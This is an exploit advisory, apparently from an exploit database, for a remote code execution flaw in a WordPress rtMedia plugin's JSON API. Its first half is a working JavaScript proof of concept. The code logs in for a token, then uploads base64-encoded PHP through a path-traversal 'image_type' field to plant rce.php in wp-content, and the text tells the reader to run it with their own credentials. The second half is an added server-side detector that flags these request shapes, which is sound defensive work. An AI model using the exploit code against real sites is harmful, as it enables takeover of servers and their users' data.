## https://sploitus.com/exploit?id=WPEX-ID:3D6889E3-A01B-4E7F-868F-AF7CC8C7531A
If the plugin's JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After enabling the API in settings and installing BuddyPress, run the following code, replacing the username, password, and server path as needed.
```javascript
// Step 1: log in through the JSON API to obtain an access token.
fetch("/wp-admin/admin-ajax.php?action=rtmedia_api", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "method=wp_login&username=USERNAME&password=PASSWORD",
  "method": "POST",
}).then((response) => {
  return response.json();
}).then((data) => {
  // Step 2: upload base64-encoded PHP; image_type and title carry the traversal path.
  const formData = new FormData();
  formData.append('rtmedia_file', btoa('<?php system("ps"); ?>'));
  formData.append('method', 'rtmedia_upload_media');
  formData.append('image_type', './../../../../../var/www/html/wp-content/rce.php');
  formData.append('title', '../');
  formData.append('token', data.data.access_token);
  fetch('/wp-admin/admin-ajax.php?action=rtmedia_api', {
    method: 'POST',
    body: formData
  });
});
```
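
A server-side check for the request shape shown above, as an added example that is not part of the original advisory or the plugin's code. It assumes the POST fields are already parsed into an object; `inspectUpload`, `ALLOWED_TYPES` and the sample requests are hypothetical and constructed for illustration.

```javascript
// Added example: flags rtmedia_api upload requests shaped like the one above.
// Assumption: ALLOWED_TYPES is an illustrative allowlist, not the plugin's own.
const ALLOWED_TYPES = new Set(['jpg', 'jpeg', 'png', 'gif']);
const TRAVERSAL = /[\/\\]|\.\./;

// Decode repeatedly so %2e%2e%2f and double-encoded forms are seen as "../".
function fullyDecode(value) {
  let current = String(value);
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function inspectUpload(fields) {
  const findings = [];
  if (fields.method !== 'rtmedia_upload_media') return findings;
  const imageType = fullyDecode(fields.image_type ?? '');
  const title = fullyDecode(fields.title ?? '');
  if (TRAVERSAL.test(imageType)) findings.push('image_type: path traversal');
  if (!ALLOWED_TYPES.has(imageType.toLowerCase())) findings.push('image_type: not an allowed extension');
  if (TRAVERSAL.test(title)) findings.push('title: path traversal');
  // rtmedia_file carries base64 content; look for a PHP open tag after decoding.
  const body = Buffer.from(String(fields.rtmedia_file ?? ''), 'base64').toString('latin1');
  if (/<\?(php|=)/i.test(body)) findings.push('rtmedia_file: PHP open tag');
  return findings;
}

// Constructed samples: one mirrors the field shapes above, one is an ordinary upload.
const suspicious = {
  method: 'rtmedia_upload_media',
  image_type: './../../../../../var/www/html/wp-content/rce.php',
  title: '../',
  rtmedia_file: Buffer.from('<?php echo 1; ?>').toString('base64'),
};
const benign = { method: 'rtmedia_upload_media', image_type: 'PNG', title: 'holiday',
  rtmedia_file: Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]).toString('base64') };
console.log(inspectUpload(suspicious));
console.log(inspectUpload(benign));
```

The same three conditions (separator or `..` in `image_type` or `title`, a type outside the allowlist, a PHP open tag in the decoded file) can be used as a request filter or as a search over logged POST bodies for `action=rtmedia_api`.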